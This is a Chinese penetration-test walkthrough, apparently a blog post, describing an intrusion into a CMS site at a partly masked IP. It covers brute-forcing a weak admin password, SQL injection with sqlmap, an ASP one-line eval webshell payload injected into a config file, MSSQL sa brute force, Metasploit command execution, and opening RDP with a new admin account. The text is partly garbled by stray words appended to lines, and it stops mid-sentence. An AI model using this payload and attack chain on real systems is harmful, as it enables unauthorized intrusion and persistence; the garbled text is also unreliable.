目标网站:39.xxx.xxx.xxxhtml
一阶段前台测试:sql
一、前台存在登录入口且无验证码(确定要暴力破解啊)shell
二、前台url参数处加敏感字符数据库报错存在sql注入数据库
三、前台登录处输入危险字符,数据库报错存在post注入缓存
测试结果以下:
cookie
暴力破解得到xss
用户名:admin编辑器
密码:123456post
利用sqlmap跑注入并无跑出任何数据测试
只能登录看一下了
2、登录前台测试
利用前台的会员登录发现有使用第三方编辑器(并无找到可利用漏洞)
存在xss漏洞
存在sql注入漏洞
在登录的状态下继续进行sql注入(burp copyto file )发现跑出来一个表
只跑出了当前帐户和一个同级帐户
到这里看了眼后台仍是一脸懵逼
3、黑盒已经很差搞了,下载同类CMS
搭建环境撸一把
把相同源码cms数据库表名
将对应代表加入sqlmap库中
路径:sqlmap/txt/common-tables.txt
(表名必定要放前边放最后要跑一年的)
继续sqlmap跑、
成功进入后台
4、getshell
进入后台以后发现编辑器两个
文件上传白名单,试了好久,基本行不通了
后台依旧存在XSS漏洞(这里的XSS能够利用拿到后台管理员cookie)
搞了半天发现又遇到瓶颈了
再去撸一把源码
发现当更新缓存的时候,根目录下多了一个HTML文件修改html文件后发现报错
在后台参数配置处修改配置发现报错
审查代码发现代码漏洞
anxinMall.basic.asp是一个ASP文件考虑写入一句话
本地构造payload(这里随便改点东西网站就瘫了若是在目标网站那确定凉凉了)
"%> <%eval request ("pass")%> <%'
菜刀链接、
5、提权、
nmap扫描发现目标开放1433端口
msf对1433端口sa进行爆破
爆破成功
mssql帐号和密码为:sa /123456
使用msf命令执行模块,执行最终的dos命令
use auxiliary/admin/mssql/mssql_exec
开启3389端口而且创建管理用户之后
利用HTTP隧道进行链接3389(绕过防火墙)
详细方法见下面的网址
https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html
另外能够